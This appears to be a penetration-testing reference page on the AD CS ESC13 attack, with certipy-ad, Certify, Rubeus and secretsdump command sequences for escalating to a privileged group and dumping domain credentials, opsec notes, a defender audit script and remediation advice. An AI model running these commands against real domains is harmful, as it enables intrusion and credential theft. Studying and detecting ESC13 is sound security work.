ADCSESC13

ESC13: OID group link (msDS-OIDToGroupLink). Enroll in a template whose issuance policy OID is linked to a privileged AD group; authenticating with the issued certificate grants membership in that group for the duration of the logon session.

Applies to: Users/Computers with Enroll rights → certificate template with issuance policy linked to a privileged group via msDS-OIDToGroupLink → Enterprise CA


Linux Abuse

certipy-ad

# Step 1: Find vulnerable templates with OID group links
certipy-ad find -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> -vulnerable -stdout
# Look for templates where "Group" appears in the output: this is the linked privileged group

# Step 2: Enroll in the ESC13-vulnerable template
certipy-ad req -u <username>@<domain> -p '<password>' -dc-ip <dc-ip> \
  -ca '<ca>' -target <ca-host> -template '<template>'
# Output: <username>.pfx

# Step 3: Authenticate; the resulting TGT/session will include the linked group membership
certipy-ad auth -pfx <username>.pfx -dc-ip <dc-ip>
# Returns NT hash; the LDAP session / TGT will have the OID-linked group in the PAC

# Step 4: Use the hash with tools that respect group membership from PKINIT
# Pass-the-hash for LDAP access (the group membership is in the Kerberos PAC)
secretsdump.py -hashes ':<ntlm-hash>' '<domain>/<username>@<dc-ip>'

# Or use the TGT directly for services where group membership matters
export KRB5CCNAME=<username>.ccache
klist

Windows Abuse

Certify.exe + Rubeus

# Step 1: Find templates with OID group links
Certify.exe find /vulnerable

# Step 2: Enroll in ESC13 template
Certify.exe request /ca:<ca-host>\<ca> /template:<template>

# Step 3: Request TGT; the PAC will contain the linked group's SID
Rubeus.exe asktgt /user:<username> /domain:<domain> /certificate:<pfx-base64> /password:<pfx-password> /ptt

# Step 4: Verify group membership in TGT
klist
whoami /groups
# Should show the OID-linked privileged group (e.g., Enterprise Admins, specific admin group)

Understanding the Impact

# Identify which group the OID links to (from certipy find output or BloodHound)
# The linked group is specified in the OID object's msDS-OIDToGroupLink attribute
# Common high-value targets: Domain Admins, Enterprise Admins, custom privileged groups

# After TGT injection, access privileged resources
dir \\<dc-ip>\c$
net use \\<dc-ip>\c$ /user:<domain>\<username>

Opsec

  • Enrollment itself appears as a normal certificate request; there are no anomalous attributes in the cert.
  • The group membership is granted via the Kerberos PAC from PKINIT, not via actual AD group membership.
  • CA retains issued cert in Issued Certificates store.
  • Detection: monitor certificate issuance for templates with OID group links, especially where the enroller is not an expected member of the linked group.
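As an added defender-side example (not part of the original page), the join the detection bullet describes, run over constructed LDAP-like records: template → msPKI-Certificate-Policy OID → the OID object's msDS-OIDToGroupLink → group, reporting templates whose link lands on a privileged group and whose enrollers are not members of it. The template, OID and group names and the enroll_principals field (a stand-in for what the template's security descriptor would yield) are constructed.

```python
"""Audit constructed AD CS objects for ESC13 exposure: a certificate template whose
issuance policy OID object carries msDS-OIDToGroupLink to a privileged group."""

# Constructed sample data standing in for LDAP results (not from a real forest).
# Templates live under CN=Certificate Templates,CN=Public Key Services,CN=Services,CN=Configuration.
TEMPLATES = {
    "ESC13-Template": {
        "msPKI-Certificate-Policy": ["1.3.6.1.4.1.311.21.8.1111.2222.3333.1"],
        "enroll_principals": ["CORP\\Domain Users"],  # constructed stand-in for the template ACL
    },
    "Safe-Template": {
        "msPKI-Certificate-Policy": ["1.3.6.1.4.1.311.21.8.1111.2222.3333.2"],
        "enroll_principals": ["CORP\\Domain Users"],
    },
    "NoPolicy-Template": {"msPKI-Certificate-Policy": [], "enroll_principals": ["CORP\\Domain Users"]},
}
# Issuance policy OID objects live under CN=OID,CN=Public Key Services,...; keyed here by OID value.
OID_OBJECTS = {
    "1.3.6.1.4.1.311.21.8.1111.2222.3333.1": {"msDS-OIDToGroupLink": "CN=Tier0-Ops,OU=Groups,DC=corp,DC=local"},
    "1.3.6.1.4.1.311.21.8.1111.2222.3333.2": {},  # issuance policy without a group link
}
GROUPS = {
    "CN=Tier0-Ops,OU=Groups,DC=corp,DC=local": {"name": "CORP\\Tier0-Ops", "member": []},
}
PRIVILEGED_GROUPS = {"CORP\\Tier0-Ops", "CORP\\Domain Admins", "CORP\\Enterprise Admins"}


def find_esc13(templates, oid_objects, groups, privileged):
    """Return one finding per (template, OID, group) where the OID group link points at a
    privileged group and a principal outside that group holds Enroll on the template."""
    findings = []
    for name, tpl in templates.items():
        for oid in tpl.get("msPKI-Certificate-Policy", []):
            link = oid_objects.get(oid, {}).get("msDS-OIDToGroupLink")
            if not link or link not in groups:
                continue  # no group link, or a link to an object we could not resolve
            group = groups[link]
            # Enrollers who are not already members: for them the cert is a privilege gain.
            outsiders = [p for p in tpl["enroll_principals"] if p not in group["member"]]
            if group["name"] in privileged and outsiders:
                findings.append({"template": name, "oid": oid, "group": group["name"], "enrollers": outsiders})
    return findings


if __name__ == "__main__":
    for f in find_esc13(TEMPLATES, OID_OBJECTS, GROUPS, PRIVILEGED_GROUPS):
        print(f"[ESC13] {f['template']} -> {f['oid']} -> {f['group']} enrollable by {f['enrollers']}")
```

Remediation for each finding is to clear msDS-OIDToGroupLink on the OID object or to restrict Enroll on the template to the group's intended members, then to alert on issuance from that template by anyone else.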